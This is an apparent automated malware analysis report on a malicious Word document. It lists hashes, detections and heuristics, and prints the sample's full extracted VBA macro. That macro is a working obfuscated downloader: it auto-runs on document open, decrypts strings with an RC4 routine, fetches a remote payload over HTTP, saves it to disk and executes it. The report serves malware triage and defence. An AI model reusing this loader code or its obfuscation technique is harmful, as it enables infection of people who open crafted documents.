Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 439d2859eb4b922c…

MALICIOUS

Office (OOXML)

30.5 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-26
MD5: 4933ae56b0de42c719b88eea1aac3a80 SHA-1: 59e0ebd3a6e4e36b8701b266eee4052922836782 SHA-256: 439d2859eb4b922cf05759c6ed0efb019a62be07d1e2cf6604183e9c979e5d27
320 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro that uses obfuscation and a Document_Open auto-execution technique. The macro utilizes CreateObject to execute a second-stage payload, likely downloaded from a URL constructed using Environ() and other obfuscated strings. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set KSIJpz8nft6CAD = CreateObject(D2Fz(Chr(236) + Chr(216) + Chr(185) + Chr(5) + Chr(62) + Chr(13) + Chr(172) + Chr(172) + Chr(166) + Chr(183) + Chr(28) + Chr(87) + Chr(62) + Chr(42) + Chr(218) + Chr(194) + Chr(139) + Chr(245) + Chr(28) + Chr(105), "XPVyq5jQN"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set KSIJpz8nft6CAD = CreateObject(D2Fz(Chr(236) + Chr(216) + Chr(185) + Chr(5) + Chr(62) + Chr(13) + Chr(172) + Chr(172) + Chr(166) + Chr(183) + Chr(28) + Chr(87) + Chr(62) + Chr(42) + Chr(218) + Chr(194) + Chr(139) + Chr(245) + Chr(28) + Chr(105), "XPVyq5jQN"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    HsMVDoD5Jy = Environ(D2Fz(Chr(13) + Chr(127) + Chr(75) + Chr(67) + Chr(34) + Chr(114) + Chr(249), "RvIfE")) & "\" & CFjlczVo & D2Fz(Chr(201) + Chr(102) + Chr(254) + Chr(196), "MCy")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 11900 bytes
SHA-256: bb10e6820e5763bcf7598bc49a5b0618509e2c2007289eef844521bd8d99fbdf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
86 of 141 identifiers look randomly generated (e.g. 'KwNGiFV3IJQx5l13SvIS') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub XfH4DtQMPD6()
Dim GoSB0m2 As Long, M7nrfbtZ8I As Long
GoSB0m2 = 35
M7nrfbtZ8I = 8
If GoSB0m2 + M7nrfbtZ8I > 2 Then
M7nrfbtZ8I = GoSB0m2 + 16
Else
MsgBox 65
End If
Dim HsMVDoD5Jy As String, KSIJpz8nft6CAD As Object, HyDASdc5EBamRN As Integer
Dim BH1lPVy As Long, Nmym7yCQ9hYL2Dc As Long
BH1lPVy = 51
Nmym7yCQ9hYL2Dc = 12
If BH1lPVy + Nmym7yCQ9hYL2Dc > 2 Then
Nmym7yCQ9hYL2Dc = BH1lPVy + 3
Else
MsgBox 4
End If
HsMVDoD5Jy = Environ(D2Fz(Chr(13) + Chr(127) + Chr(75) + Chr(67) + Chr(34) + Chr(114) + Chr(249), "RvIfE")) & "\" & CFjlczVo & D2Fz(Chr(201) + Chr(102) + Chr(254) + Chr(196), "MCy")
Dim OspRMmbjTNEA As Long, AtZ8IJ As Long
OspRMmbjTNEA = 8
AtZ8IJ = 16
If OspRMmbjTNEA + AtZ8IJ > 2 Then
AtZ8IJ = OspRMmbjTNEA + 65
Else
MsgBox 42
End If
Set KSIJpz8nft6CAD = CreateObject(D2Fz(Chr(236) + Chr(216) + Chr(185) + Chr(5) + Chr(62) + Chr(13) + Chr(172) + Chr(172) + Chr(166) + Chr(183) + Chr(28) + Chr(87) + Chr(62) + Chr(42) + Chr(218) + Chr(194) + Chr(139) + Chr(245) + Chr(28) + Chr(105), "XPVyq5jQN"))
Dim R19PNpP As Long, NaFSdMOrB97 As Long
R19PNpP = 6
NaFSdMOrB97 = 94
If R19PNpP + NaFSdMOrB97 > 2 Then
NaFSdMOrB97 = R19PNpP + 29
Else
MsgBox 24
End If
KSIJpz8nft6CAD.Open D2Fz(Chr(193) + Chr(71) + Chr(19), "Oyg5ba02n3u0"), D2Fz(Chr(58) + Chr(112) + Chr(221) + Chr(177) + Chr(180) + Chr(25) + Chr(214) + Chr(3) + Chr(140) + Chr(123) + Chr(1) + Chr(69) + Chr(183) + Chr(73) + Chr(164) + Chr(59) + Chr(63) + Chr(77) + Chr(78) + Chr(238) + Chr(74) + Chr(100) + Chr(168) + Chr(60) + Chr(197) + Chr(227), "X5ISnYpsqWuv38"), False
Dim PW0Mn9SCnoS As Long, URtOVk16MDeWvP As Long
PW0Mn9SCnoS = 15
URtOVk16MDeWvP = 68
If PW0Mn9SCnoS + URtOVk16MDeWvP > 2 Then
URtOVk16MDeWvP = PW0Mn9SCnoS + 33
Else
MsgBox 66
End If
KSIJpz8nft6CAD.setRequestHeader D2Fz(Chr(161) + Chr(81) + Chr(92) + Chr(111) + Chr(3) + Chr(32) + Chr(60) + Chr(127) + Chr(158) + Chr(244), "IaLRt"), D2Fz(Chr(158) + Chr(62) + Chr(118) + Chr(17) + Chr(119) + Chr(0) + Chr(129) + Chr(80) + Chr(206) + Chr(71) + Chr(99), "FQLfB72baZog")
KSIJpz8nft6CAD.send
If KSIJpz8nft6CAD.Status = 200 Then
Dim W13LxFOD As Long, KQFgaZZnvton3 As Long
W13LxFOD = 79
KQFgaZZnvton3 = 25
If W13LxFOD + KQFgaZZnvton3 > 2 Then
KQFgaZZnvton3 = W13LxFOD + 88
Else
MsgBox 45
End If
HyDASdc5EBamRN = FreeFile
Open HsMVDoD5Jy For Binary Access Write Lock Write As #HyDASdc5EBamRN
Put #HyDASdc5EBamRN, , D2Fz(StrConv(KSIJpz8nft6CAD.ResponseBody, vbUnicode), D2Fz(Chr(24) + Chr(124) + Chr(205) + Chr(42) + Chr(62) + Chr(239) + Chr(21) + Chr(222) + Chr(115), "FG9vnhxo"))
Close #HyDASdc5EBamRN
Dim EFIEYvjfqDswB8 As Long, AR7spRMmb As Long
EFIEYvjfqDswB8 = 85
AR7spRMmb = 55
If EFIEYvjfqDswB8 + AR7spRMmb > 2 Then
AR7spRMmb = EFIEYvjfqDswB8 + 47
Else
MsgBox 25
End If
LkYBPqZ2pYz2E 1
Dim BRdybSYgiXR4o As Long, YITs6bB8SRFue7qk As Long
BRdybSYgiXR4o = 14
YITs6bB8SRFue7qk = 70
If BRdybSYgiXR4o + YITs6bB8SRFue7qk > 2 Then
YITs6bB8SRFue7qk = BRdybSYgiXR4o + 1
Else
MsgBox 37
End If
CreateObject(D2Fz(Chr(86) + Chr(45) + Chr(155) + Chr(126) + Chr(254) + Chr(195) + Chr(193) + Chr(70) + Chr(135) + Chr(175) + Chr(170) + Chr(16) + Chr(10), "GuKqFa13Lx")).Run """" & HsMVDoD5Jy & """"
Dim XBmXUcqG As Long, Xz3Db As Long
XBmXUcqG = 44
Xz3Db = 81
If XBmXUcqG + Xz3Db > 2 Then
Xz3Db = XBmXUcqG + 96
Else
MsgBox 76
End If
End If
Dim KwNGiFV3IJQx5l13SvIS As Long, LZUKL71VfmI As Long
KwNGiFV3IJQx5l13SvIS = 80
LZUKL71VfmI = 25
If KwNGiFV3IJQx5l13SvIS + LZUKL71VfmI > 2 Then
LZUKL71VfmI = KwNGiFV3IJQx5l13SvIS + 66
Else
MsgBox 14
End If
Set KSIJpz8nft6CAD = Nothing
Dim AEFlHPFTDfxX As Long, JkNMhZ As Long
AEFlHPFTDfxX = 31
JkNMhZ = 47
If AEFlHPFTDfxX + JkNMhZ > 2 Then
JkNMhZ = AEFlHPFTDfxX + 71
Else
MsgBox 26
End If
End Sub
Function D2Fz(ByVal R3sCKtWAO9kp As String, ByVal ThOtgbOMZo7yFM As String) As String
Dim TdK7P0PBr5 As Long, WLsfwf As Long
TdK7P0PBr5 = 90
WLsfwf = 95
If TdK7P0PBr5 + WLsfwf > 2 Then
WLsfwf = TdK7P0PBr5 + 79
Else
MsgBox 28
End If
On Error Resume Next
Dim JYLNU As Long, Oe6z2TL4AAQJ As Long
JYLNU = 79
Oe6z2TL4AAQJ = 3
If JYLNU + Oe6z2TL4AAQJ > 2 Then
Oe6z2TL4AAQJ = JYLNU + 31
Else
MsgBox 94
End If
Dim YXPH8OZt5dY(0 To 255) As Integer, Yl5vemNkHz As Long, RpR1eogc8pT1p As Long, Yh59d As Long, G5CTTvO1idq() As Byte, PFG4K1M0Z3() As Byte, YniT3N8ZipvpEZ8 As Byte
Dim U7JIwdMeW51ZmDcTD As Long, D6eZJO8Zieaj As Long
U7JIwdMeW51ZmDcTD = 92
D6eZJO8Zieaj = 35
If U7JIwdMeW51ZmDcTD + D6eZJO8Zieaj > 2 Then
D6eZJO8Zieaj = U7JIwdMeW51ZmDcTD + 82
Else
MsgBox 93
End If
G5CTTvO1idq() = StrConv(ThOtgbOMZo7yFM, vbFromUnicode)
Dim HyBMeST As Long, IEFlHPFTDfxX As Long
HyBMeST = 42
IEFlHPFTDfxX = 16
If HyBMeST + IEFlHPFTDfxX > 2 Then
IEFlHPFTDfxX = HyBMeST + 67
Else
MsgBox 11
End If
For Yl5vemNkHz = 0 To 255
YXPH8OZt5dY(Yl5vemNkHz) = Yl5vemNkHz
Next Yl5vemNkHz
Yl5vemNkHz = 0
RpR1eogc8pT1p = 0
Yh59d = 0
For Yl5vemNkHz = 0 To 255
RpR1eogc8pT1p = (RpR1eogc8pT1p + YXPH8OZt5dY(Yl5vemNkHz) + G5CTTvO1idq(Yl5vemNkHz Mod Len(ThOtgbOMZo7yFM))) Mod 256
YniT3N8ZipvpEZ8 = YXPH8OZt5dY(Yl5vemNkHz)
YXPH8OZt5dY(Yl5vemNkHz) = YXPH8OZt5dY(RpR1eogc8pT1p)
YXPH8OZt5dY(RpR1eogc8pT1p) = YniT3N8ZipvpEZ8
Next Yl5vemNkHz
Yl5vemNkHz = 0
RpR1eogc8pT1p = 0
Yh59d = 0
PFG4K1M0Z3() = StrConv(R3sCKtWAO9kp, vbFromUnicode)
For Yl5vemNkHz = 0 To Len(R3sCKtWAO9kp)
RpR1eogc8pT1p = (RpR1eogc8pT1p + 1) Mod 256
Yh59d = (Yh59d + YXPH8OZt5dY(RpR1eogc8pT1p)) Mod 256
YniT3N8ZipvpEZ8 = YXPH8OZt5dY(RpR1eogc8pT1p)
YXPH8OZt5dY(RpR1eogc8pT1p) = YXPH8OZt5dY(Yh59d)
YXPH8OZt5dY(Yh59d) = YniT3N8ZipvpEZ8
PFG4K1M0Z3(Yl5vemNkHz) = PFG4K1M0Z3(Yl5vemNkHz) Xor (YXPH8OZt5dY((YXPH8OZt5dY(RpR1eogc8pT1p) + YXPH8OZt5dY(Yh59d)) Mod 256))
Next Yl5vemNkHz
Dim QT4uDj25jFUcdXM1 As Long, LkZ4qBY3izLwd As Long
QT4uDj25jFUcdXM1 = 34
LkZ4qBY3izLwd = 13
If QT4uDj25jFUcdXM1 + LkZ4qBY3izLwd > 2 Then
LkZ4qBY3izLwd = QT4uDj25jFUcdXM1 + 52
Else
MsgBox 33
End If
D2Fz = StrConv(PFG4K1M0Z3, vbUnicode)
Dim CQTJlBWx As Long, MKk0SD As Long
CQTJlBWx = 97
MKk0SD = 21
If CQTJlBWx + MKk0SD > 2 Then
MKk0SD = CQTJlBWx + 98
Else
MsgBox 93
End If
End Function
Sub GWhFDsp3K4tG()
Dim ASC3kXXeTrway As Long, VvQBAoKkJA6 As Long
ASC3kXXeTrway = 67
VvQBAoKkJA6 = 13
If ASC3kXXeTrway + VvQBAoKkJA6 > 2 Then
VvQBAoKkJA6 = ASC3kXXeTrway + 76
Else
MsgBox 33
End If
Dim UxfGtCD3k As Long, DEblx1nkVvA6 As Long
UxfGtCD3k = 89
DEblx1nkVvA6 = 93
If UxfGtCD3k + DEblx1nkVvA6 > 2 Then
DEblx1nkVvA6 = UxfGtCD3k + 56
Else
MsgBox 94
End If
End Sub
Sub LkYBPqZ2pYz2E(IGn8B3qi9lpvskcX As Long)
Dim YPZNUEcqdg6YlOuf8 As Long, U8X85ROM3QAm2 As Long
YPZNUEcqdg6YlOuf8 = 61
U8X85ROM3QAm2 = 7
If YPZNUEcqdg6YlOuf8 + U8X85ROM3QAm2 > 2 Then
U8X85ROM3QAm2 = YPZNUEcqdg6YlOuf8 + 70
Else
MsgBox 27
End If
Dim Xz50wp72MHyxZ3m As Long
Dim QcAFf As Long, BtJPi1d2mS As Long
QcAFf = 50
BtJPi1d2mS = 39
If QcAFf + BtJPi1d2mS > 2 Then
BtJPi1d2mS = QcAFf + 74
Else
MsgBox 68
End If
Xz50wp72MHyxZ3m = Timer + IGn8B3qi9lpvskcX
Do While Timer < Xz50wp72MHyxZ3m
DoEvents
Loop
Dim Hq38fCs As Long, YfJfyNrEmWqp0pDfp As Long
Hq38fCs = 73
YfJfyNrEmWqp0pDfp = 95
If Hq38fCs + YfJfyNrEmWqp0pDfp > 2 Then
YfJfyNrEmWqp0pDfp = Hq38fCs + 3
Else
MsgBox 31
End If
End Sub
Sub Document_Open()
Dim Xvwx7d63kIwbTCB As Long, Cw1mEbalSXIVkcf As Long
Xvwx7d63kIwbTCB = 34
Cw1mEbalSXIVkcf = 86
If Xvwx7d63kIwbTCB + Cw1mEbalSXIVkcf > 2 Then
Cw1mEbalSXIVkcf = Xvwx7d63kIwbTCB + 4
Else
MsgBox 27
End If
Dim DDULDhJjL As Long, Ywr2wJdLCpSG8N As Long, CjB3tXEZACXMs As Long
Dim YVQ1j21R4mN2acx As Long, CNchvYTAwT As Long
YVQ1j21R4mN2acx = 27
CNchvYTAwT = 10
If YVQ1j21R4mN2acx + CNchvYTAwT > 2 Then
CNchvYTAwT = YVQ1j21R4mN2acx + 36
Else
MsgBox 56
End If
DDULDhJjL = 928261687: Ywr2wJdLCpSG8N = 0: CjB3tXEZACXMs = 0
Dim I8d7w1mEbalSX As Long, Ogk As Long
I8d7w1mEbalSX = 6
Ogk = 73
If I8d7w1mEbalSX + Ogk > 2 Then
Ogk = I8d7w1mEbalSX + 17
Else
MsgBox 85
End If
For Ywr2wJdLCpSG8N = 1 To DDULDhJjL
CjB3tXEZACXMs = CjB3tXEZACXMs + 1
Next Ywr2wJdLCpSG8N
Dim OJaZjciIUja5iM5 As Long, IUE36HnmscmjYF4 As Long
OJaZjciIUja5iM5 = 52
IUE36HnmscmjYF4 = 32
If OJaZjciIUja5iM5 + IUE36HnmscmjYF4 > 2 Then
IUE36HnmscmjYF4 = OJaZjciIUja5iM5 + 93
Else
MsgBox 84
End If
If CjB3tXEZACXMs = DDULDhJjL Then
Dim CFhmb63TP As Long, YNVlS7QBc As Long
CFhmb63TP = 22
YNVlS7QBc = 48
If CFhmb63TP + YNVlS7QBc > 2 Then
YNVlS7QBc = CFhmb63TP + 68
Else
MsgBox 35
End If
XfH4DtQMPD6
Dim UI9AtYU As Long, TP8JsXUN As Long
UI9AtYU = 89
TP8JsXUN = 98
If UI9AtYU + TP8JsXUN > 2 Then
TP8JsXUN = UI9AtYU + 70
Else
MsgBox 56
End If
Else
Dim IGmFCRAbczI As Long, IMdumNyDmu0Xu As Long
IGmFCRAbczI = 52
IMdumNyDmu0Xu = 55
If IGmFCRAbczI + IMdumNyDmu0Xu > 2 Then
IMdumNyDmu0Xu = IGmFCRAbczI + 73
Else
MsgBox 19
End If
GWhFDsp3K4tG
Dim Gake231ahaCfl As Long, YZE4wtCTFgn As Long
Gake231ahaCfl = 51
YZE4wtCTFgn = 86
If Gake231ahaCfl + YZE4wtCTFgn > 2 Then
YZE4wtCTFgn = Gake231ahaCfl + 80
Else
MsgBox 24
End If
End If
Dim IVfK As Long, LU7MPm9po As Long
IVfK = 31
LU7MPm9po = 47
If IVfK + LU7MPm9po > 2 Then
LU7MPm9po = IVfK + 71
Else
MsgBox 25
End If
End Sub
Function CFjlczVo() As String
Dim JiErhSU18K2CH As Long, GWjVf As Long
JiErhSU18K2CH = 6
GWjVf = 47
If JiErhSU18K2CH + GWjVf > 2 Then
GWjVf = JiErhSU18K2CH + 24
Else
MsgBox 42
End If
Dim Qeve0iw5OlftUnnRD() As Byte, VPv4TygZoL() As Byte, QkmJFWL4jvi As Long, YjoTSfZNd As Long, HAwTwFRPp As String, GBaCZlPGz3K7l2 As String, QaZZrQglQNfSY As Long
Dim H94uFcX55vmjI As Long, XLf4CQqVGE3i1DSd As Long
H94uFcX55vmjI = 74
XLf4CQqVGE3i1DSd = 16
If H94uFcX55vmjI + XLf4CQqVGE3i1DSd > 2 Then
XLf4CQqVGE3i1DSd = H94uFcX55vmjI + 19
Else
MsgBox 37
End If
QaZZrQglQNfSY = 0
Dim XFnPxcRWuBgSeD0P As Long, OkyYerwNVlS As Long
XFnPxcRWuBgSeD0P = 17
OkyYerwNVlS = 16
If XFnPxcRWuBgSeD0P + OkyYerwNVlS > 2 Then
OkyYerwNVlS = XFnPxcRWuBgSeD0P + 46
Else
MsgBox 27
End If
MaCZ2Mqu:
Dim PiyQnA4fM As Long, KkbyDlpTnfUsd As Long
PiyQnA4fM = 29
KkbyDlpTnfUsd = 28
If PiyQnA4fM + KkbyDlpTnfUsd > 2 Then
KkbyDlpTnfUsd = PiyQnA4fM + 4
Else
MsgBox 4
End If
Randomize
GBaCZlPGz3K7l2 = Int(30 * Rnd)
If GBaCZlPGz3K7l2 < 4 Then GoTo MaCZ2Mqu
QaZZrQglQNfSY = GBaCZlPGz3K7l2
If QaZZrQglQNfSY > 0& Then
Dim JAQ1lvXp6Iu As Long, OAeAP As Long
JAQ1lvXp6Iu = 76
OAeAP = 83
If JAQ1lvXp6Iu + OAeAP > 2 Then
OAeAP = JAQ1lvXp6Iu + 89
Else
MsgBox 73
End If
HAwTwFRPp = D2Fz(Chr(171) + Chr(144) + Chr(12) + Chr(15) + Chr(58) + Chr(15) + Chr(89) + Chr(75) + Chr(62) + Chr(173), "E7RMp04kOGS")
Randomize
Qeve0iw5OlftUnnRD = HAwTwFRPp
QkmJFWL4jvi = Len(HAwTwFRPp) - 1&
QaZZrQglQNfSY = (QaZZrQglQNfSY * 2&) - 1&
ReDim VPv4TygZoL(QaZZrQglQNfSY) As Byte
Dim AtptoaSmsefFYhR As Long, Sxprn6FOC74mPv5 As Long
AtptoaSmsefFYhR = 67
Sxprn6FOC74mPv5 = 13
If AtptoaSmsefFYhR + Sxprn6FOC74mPv5 > 2 Then
Sxprn6FOC74mPv5 = AtptoaSmsefFYhR + 3
Else
MsgBox 59
End If
For YjoTSfZNd = 0& To QaZZrQglQNfSY Step 2&
VPv4TygZoL(YjoTSfZNd) = Qeve0iw5OlftUnnRD(CLng(QkmJFWL4jvi * Rnd) * 2&)
Next
Dim J4ZNW78pR As Long, OGN7B2 As Long
J4ZNW78pR = 2
OGN7B2 = 10
If J4ZNW78pR + OGN7B2 > 2 Then
OGN7B2 = J4ZNW78pR + 37
Else
MsgBox 30
End If
End If
Dim JGIg0jwnB As Long, LIuEQKP4ZNW78p As Long
JGIg0jwnB = 52
LIuEQKP4ZNW78p = 57
If JGIg0jwnB + LIuEQKP4ZNW78p > 2 Then
LIuEQKP4ZNW78p = JGIg0jwnB + 42
Else
MsgBox 89
End If
CFjlczVo = VPv4TygZoL
Dim XhKhe As Long, VVzgQGDgk97nXiq As Long
XhKhe = 29
VVzgQGDgk97nXiq = 53
If XhKhe + VVzgQGDgk97nXiq > 2 Then
VVzgQGDgk97nXiq = XhKhe + 30
Else
MsgBox 25
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30720 bytes
SHA-256: c092693bdedc730f31b8c5548e510339388bd48ae91f4ce3c17c78f03c04218e
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
152 of 297 identifiers look randomly generated (e.g. 'KwNGiFV3IJQx5l13SvIS') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.